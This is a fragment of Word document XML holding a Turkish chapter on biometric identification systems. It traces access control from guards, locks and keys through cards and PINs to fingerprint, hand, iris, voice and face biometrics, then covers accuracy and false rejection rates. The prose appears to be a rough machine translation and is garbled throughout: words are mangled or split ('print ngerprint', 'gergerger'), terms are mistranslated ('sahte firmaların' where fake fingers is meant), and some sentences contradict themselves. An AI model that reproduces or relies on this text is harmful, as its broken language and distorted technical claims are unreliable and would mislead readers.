    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Güvenli bir binaya açılan kapının, bir kişinin fiziksel varlığına göre tanımlanması için otomatik bir sistem kullanılarak açılabildiği bir gün öngörülmekle birlikte, bu kişi kimliğini veya erişim kartını evde mutfak tezgahında bırakmış olsa da. Bir kişinin uçağa girişte biyometrik olarak </w:t>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>doğrulanan pozitif bir tanımlamaya dayanarak uçağa girebileceğini, biletsiz havayolu seyahatini hayal edin. Arabaya binmek, motoru sürücünün vizörünü aşağı doğru iterek çalıştırmak, aynaya bakmak ve uzaklaşmak, sadece yetkili kişilerin aracın çalışmasını sağlayabilecekleri konusunda güvence altına alın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u eylemler rutin olan günlük hızla yaklaşıyor. Aslında, hızlı, doğru, güvenilir ve kullanıcı kabul edilebilir biyometrik tanımladı fi katyon sistemlerinin uygulanması zaten devam ediyor. Toplumsal davranış kalıpları otomatik olumlu tanımladı fi katyon sistemleri için gereklilikleri sürekli artan sonuçlanır ve bu daha da hızla büyüyor. Bu sistemler için potansiyel uygulamalar yalnızca bir kişinin hayal gücü ile sınırlıdır. Performans iddiaları gerçekçi inanılmaz tam spektrum kapsamaktadır. Bu yeni teknolojiler ile Sistem uygulama sorunları tahmin edilebileceği yüksek olmuştur. Kullanıcı kabul engeller artıyor. Bu sistemlerin kullanımını öğrenen Güvenlik uygulayıcıları üreticileri ve satıcıları tarafından sağlanan genellikle çelişkili bilgiler ezici miktarlarda karşı karşıyayız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bölüm, güvenlik uzmanına, biyometrik bir tanımlama sisteminin seçilmesi, kurulması ve çalıştırılmasında olası tehlikelerin önlenmesi için gereken bilgileri sunar. Bu sistemlerin özellikleri, belirli uygulamalar için hangilerinin en önemli olduğu konusunda karar vermeyi mümkün kılmak için ayrıntılı olarak tanıtılmıştır. Biyometrik sistemlerin örgütsel kullanımında yaşanan tarihsel problemler de tartışılmaktadır. Son olarak, piyasada bulunan spesifik teknolojiler, veri toplama süreci, kayıt prosedürü, veri dosyaları, kullanıcı arayüzü işlemleri, hız, sahteciliği önleme bilgileri, doğruluk ve benzersiz sistem özellikleri dahil olmak üzere açıklanmıştır.&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D407C1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc9978677"/>
      <w:bookmarkStart w:id="3" w:name="_Toc9979159"/>
      <w:r w:rsidRPr="00D407C1">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:t xml:space="preserve"> Biyometrik Gelişime Giden Geçmiş ve Tarihçe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D407C1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnsanlığın ilk günlerinden beri, insanlar varlıklarını koruma sorunu ile mücadele etti. Yetkilendirilmemiş kişilerin, değerli olarak kabul edilen şeyleri, hatta bir yiyecek önbelleğini bile yapmaları etkili ve verimli bir şekilde nasıl önlenebilir? Tabii ki, en kısa sürede elde edilen çözüm, her zaman en yüksek değere sahip varlıklar için olduğu gibi bir bekçi oluşturmaktı. Ardından, şimdi olduğu gibi, insan korumanın, kaynakları korumak için yetersiz ve bazen etkisiz bir yöntem olduğu anlaşıldı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sağlam bir kapının oluşturulması, örneğin, penceresiz bir oda veya sağlam bir kapı dışında başka açıklıklar olmayan bir oda, doğru yönde bir adımdı. Oradan kilit ve anahtarın eklenmesi, sürekli korumanın kaldırılmasını sağlayan küçük ama çok etkili bir hareketti. Korunan varlıklara yetkilendirilmiş erişime sahip olanlara, bu anahtarlara sahip oldukları gerçeğine dayanarak yetkili kişilerin tespit edilme döneminin başlangıcı olan anahtarlar verilmiştir. Yüzyıllar içinde, daha iyi güvenlik sağlamak için kilitler ve anahtarlar art arda geliştirildi. Kalıcı sorun kayboldu ve anahtarlar çalındı. Bu olaylar gerçekleştiğinde, tek çözüm kilidi (sonradan sadece silindir) ve zaman alan ve pahalı olan tüm anahtarların değiştirilmesiydi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir sonraki büyük buluş, plastik kartlara sahip anahtar okuyucular tarafından kontrol edilen elektronik kilitlerin ortaya çıkmasıydı. Bu, yetkili kişilerin sahip oldukları şeylere (örneğin, kodlanmış plastik kartlara) dayanarak belirlenmesi dönemini sürdürmüştür. En büyük gelişme, kapının kilidini açmak için kaybolan veya çalınan (anahtar) kartların elektronik olarak kaldırılabilmesiydi. Bu nedenle, hiçbir zaman kilit ve anahtarların değiştirilmesi </w:t>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gerekmiyordu; zaman ve maliyette önemli tasarruflar vardı. Ancak, zaman geçtikçe deneyimler, bazı kişilerin yetkili kişilerin kartlarının kaybolduğunu veya çalındığını bile fark etmeden kaldırıldığını kanıtladı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kişisel Kimlik Numarası (PIN) tuş takımının kart okuyucusuna eklenmesi, bildirilmeyen kayıp veya çalınan kart sorununa çözüm oldu. Böylece, yetkili kişilerin sahip oldukları ve bildikleri şeylere (örneğin bir PIN) dayanarak belirlenmesi dönemi başladı. Bu, “kötü adamlar”, çoğu insanın doğum günleri, yıldönümleri veya hayatlarında önemli olan diğer sayılar gibi hatırlamaları kolay PIN'leri seçmesine karar verene kadar iyi çalıştı. Kayıp veya çalınan bir kart ve birkaç deneme ile “kötü adamlar” doğru PIN'i tahmin etmede ve korunan alana erişmede bazen başarılı olmuşlardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Açık olan çözüm, yalnızca rastgele sayıları PIN olarak kullanmaktı; bu da, PIN'lerin deneme veya yanılma yoluyla tahmin edilmesi veya bulunması sorununu çözdü. Bununla birlikte, rastgele sayıları hatırlama konusundaki zorluk başka öngörülebilir bir soruna neden olmuştur. PIN'ler (ve şifreler) bir kağıda, Post-It notlarına, ehliyetlerine, not defterlerine, bülten panolarına, bilgisayarlara veya gerektiğinde bulabilecekleri her yere yazılmıştır. Bazen giriş kartlarına kendileri yazılmışlardı. Ek olarak, girilen PIN'lerin gözlenmesi genellikle kolay olduğu için, hırsızlığı planlayan “kötü adamlar” bazen ilgili kartı çalmadan önce bu numarayı elde edebiliyorlardı. Bu senaryolar, kart okuyucuların, PIN'leri olanlar dahil olmak üzere, yetkili girişi olan kişilerin kimliğini olumlu olarak doğrulayamadıklarını göstermektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erişim kimliğini doğrulamakta gerçekten olumlu olmanın tek yolu, doğrulamayı kişilerin kendi fiziksel özelliklerine (yani biyometrik tanımlama) dayandırmaktır. Kimlik doğrulama gereksinimlerinin çoğu insanlar tam olarak giyindiğinde (boyundan ayağa ve bilekler) gerçekleştiğinden, vücudun bu amaç için uygun olan kısımları eller, yüz ve gözlerdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D407C1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc9978678"/>
      <w:bookmarkStart w:id="5" w:name="_Toc9979160"/>
      <w:r w:rsidRPr="00D407C1">
        <w:t>1.2 .</w:t>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:t xml:space="preserve"> Biyometrik </w:t>
      </w:r>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:t>elişim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D407C1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gerçekten olumlu bir tanımlamanın sadece kişinin fiziksel özelliklerine dayanabileceği ortaya çıktığında, iki sorunun yanıtlanması gerekiyordu. İlk olarak, vücudun hangi kısmı kullanılabilir? İkincisi, performansta uygulanabilir olması için yeterli doğruluk, güvenilirlik ve hız ile tanımlama nasıl başarılabilir? Bununla birlikte, otomatik kişisel tanımlama gerektiren baskılar en yüksek seviyelerde hızlı bir şekilde artmıyorsa (gerekli kaynakları ve fonları mevcut kılıyordu), bu araştırma gerçekleşmeyecekti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D407C1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O zamanlar, evrensel olarak pozitif bir tanımlayıcı olarak kabul edilen insan vücudu ile ilişkili ölçülebilir tek karakter print ngerprint idi. Özel mürekkepler, toz alma tozları ve örneğin bant kullanılarak toplanan iletişim bilgileri, özel olarak eğitilmiş uzmanlar tarafından eşleştirilir. Eşsiz konumlandırılmış dilimler, sırtlar ve çatallanmalar yerleştirilmiş ve şablonlarla karşılaştırılmıştır. Bir cam parçasına bastırılmış bir parmakla yapılan baskıyı okuyabilen bir sensör gerekliydi. Toplanan baskıyı depolanmış bir şablonla eşleştirmek klasik bir bilgisayar görevidir. Neyse ki, bu tanımlama soruları sorulduğunda, bilgisayar işleme yetenekleri ve hızı hızla artarken, boyut ve maliyet düşüyordu. Durum böyle olmasaydı, ilk biyometrik sistem gelişimi bile gerçekleşmezdi.Biyometriklerin yaygın kabul edilebilirlik ve alan proliferasyonu elde etmeleri için 25 yıllık ek bir bilgisayar ve biyometrik ilerleme ve maliyet azaltma işlemi gerçekleştirdi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400B62">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tahmin edilebileceği gibi, erken belirleme belirleyici doğrulama sistemleri piyasada başarılı değildi, ancak yapmak için tasarlandıklarını yapamadıkları için başarılı olamadılar. Onlar yaptı. Kilit problemler yavaş karar verme hızı ve sahte firmaların tespit edebilme yeteneğinin olmamasıydı. Dakikada iki ila üç kişinin iş çıkışı, bekleme çizgileri, kişisel hayal kırıklığı ve üretken zaman kaybına neden olur. Sahte girdilerin (örneğin lastik numaralar, fotoğraf görüntüleri) tespit edilmemesi, sahte uygulamaların yanlış kabul edilmesine neden olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hızlı, doğru ve güvenilir biyometrik kimlik doğrulamasının değeri henüz tam olarak mevcut olmasa bile hızlı bir şekilde tanındı. Kısa bir süre sonra, organize biyometrik araştırma ve geliştirme çabalarının sayısı 20'yi aştı. Çoğu gergerger baskı şirketiydi: parmak izi; tam baskı; iplik kalıbı (yani, kısaltıcının alt tarafındaki kırışıklıklar); ve avuç içi baskı. El topografyası (yani, elin parçalarının bir yüzeye karşı yerleştirilmiş yandan görünüşlerinin yükselmesi), doğru doğrulama için yeterince benzersiz olmadığını kanıtlamış, ancak elin üstten bir görünümü (yani el geometrisi) ile birleştirildiğinde, Alandaki en başarılı sistemler. İki geometri, yakın zamanda pazarlanan bir varyasyondur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>En azından bir dereceye kadar pazar kabulü elde eden diğer teknolojiler arasında ses kalıpları, retina taraması (yani göz küresinin içindeki kan damarı şablonu), imza dinamikleri (yani, kalem vuruşlarının hızı, yönü ve baskısı) ve iris yer alır. Tanınma (yani, gözün gözbebeği etrafındaki renkli kısımdaki özelliklerin paterni). Pazara ulaşmış ancak henüz kalmamış diğerleri, tuş dinamiklerini (yani, kelimeleri yazarken ölçülen hız ve zamanın deseni) ve imza tanıma (eşleştirme) içerir. Potansiyel biyometrik tanımlayıcılar olarak araştırılan ve halen araştırılmakta olan diğer fiziksel özellikler arasında, uzunluk uzunluğu (tamamen benzersiz olmasa da), bilek damarları (altta), el damarları (elin arkası), mafsal kırışıklıkları (bir bar tutulduğunda),ert parmak ucu yapısı (derinin altındaki kan damarı modeli), sections bölümleri (birinci ve ikinci eklem arasında), kulak şekli ve dudak şekli. Bir kuruluş, vücut kokusuna dayanan biyometrik tanımlamayı araştıran önemli miktarda para ve zaman harcamaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dikkat çekici (ve fonlama) alan doğrulama alanını tanımlayan bir başka biyometrik yüz tanımadır. Bu kısmen, standart görüntü teknolojisi ile yüz görüntüleri elde etmenin kolaylığından ve başarılı bir yüz tanıma sisteminin yararlanabileceği algılanan yüksek kazanımın sonucudur. Yüz termografisi (yani yüz dokusunun ısı düzenleri), yüksek kamera maliyeti nedeniyle pahalı bir varyasyondur. Biyometrik belirleyici doğrulama sistemlerinin gelişiminin tarihi tam olmaktan uzaktır. Girişimciler daha hızlı, daha doğru ve güvenilir teknoloji için zengin ödüller görmeye devam ediyorlar ve gelişmiş gelişim devam edecek. Ancak, gelişmelerin mevcut teknolojilerin iyileştirilmesi veya değişmesi olması bekleniyor. Bunlar, “ne olduğumuz” sistemleri için eller, gözler ve yüz ile ilişkilendirilecektir.ve “yaptığımız”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistemlerin sesi ve imzası.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B44DDA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc9978679"/>
      <w:bookmarkStart w:id="7" w:name="_Toc9979161"/>
      <w:r w:rsidRPr="00D407C1">
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> Biyometrik Sistemlerin Özellikleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bunlar, etkili bir biyometrik sistem için gerekli olan önemli faktörlerdir: doğruluk, hız ve verim oranı, kullanıcılara kabul edilebilirlik, biyometrik organın ve eylemin benzersizliği, sahteciliğe karşı direnç, güvenilirlik, veri saklama </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gereksinimleri, kayıt süresi, veri toplama yetkisizliği ve konu ve sistem iletişim gereklilikleri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc9978680"/>
      <w:bookmarkStart w:id="9" w:name="_Toc9979162"/>
      <w:r w:rsidRPr="00400B62">
        <w:t>1.4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t>oğruluk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk, bir biyometrik tanımlayıcı doğrulama sisteminin en kritik özelliğidir. Sistem gerçek kişileri sahtekârlardan doğru bir şekilde ayıramazsa, biyometrik bir tanımlama sistemi olarak bile adlandırılmamalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc9978681"/>
      <w:bookmarkStart w:id="11" w:name="_Toc9979163"/>
      <w:r>
        <w:t>1.5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> Yanlış Reddetme Oranı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel olarak otantik, kayıtlı kişilerin tanımlanamayan veya doğrulanmamış kişilerin biyometrik bir sistem tarafından reddedilme yüzdesi olarak belirtilen oran, sahte reddetme oranı olarak adlandırılır. Yanlış ret bazen Tip I hata olarak adlandırılır. Erişim kontrolünde, eğer “kötü adamları” dışarıda tutmak şartsa, yanlış reddetme en az önemli hata olarak kabul edilir. Bununla birlikte, diğer biyometrik uygulamalarda, en önemli hata olabilir. Müşteri kimliğini ve hesap bakiyesini doğrulamak için bir banka veya perakende mağazası tarafından kullanıldığında, yanlış reddetme, işlemin veya satışın (ve ilişkili ürün) kaybolduğu ve müşterinin üzüldüğü anlamına gelir. Çoğu bankacı ve perakendeci, yanlış reddetmediği sürece birkaç yanlış kabul etmeye isteklidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yanlış reddetmeler ayrıca, verim, hayal kırıklığı ve engelsiz işlemler üzerinde olumsuz etkiye sahiptir, çünkü personel hareketlerinde gereksiz gecikmelere neden olurlar. Bazen yanlış bir şekilde reddedilme ile ilişkilendirilen ilgili bir problem, edinilememesidir. Elde edilememesi, biyometrik sensöre, gerçek veya sahtekar bir karar vermek için yeterli miktarda kullanılabilir veri sunmadığında meydana gelir. Örnek olarak, baskı sistemi üzerindeki lekeli baskılar, el geometrisi sisteminde yanlış el konumlandırma, retina veya iris sisteminde yanlış hizalama veya bir ses sisteminde mırıldanma sayılabilir. Denekler, kazayla ya da bilerek yaralam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a sorunlarına neden olurlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc9978682"/>
      <w:bookmarkStart w:id="13" w:name="_Toc9979164"/>
      <w:r>
        <w:t>1.6.</w:t>
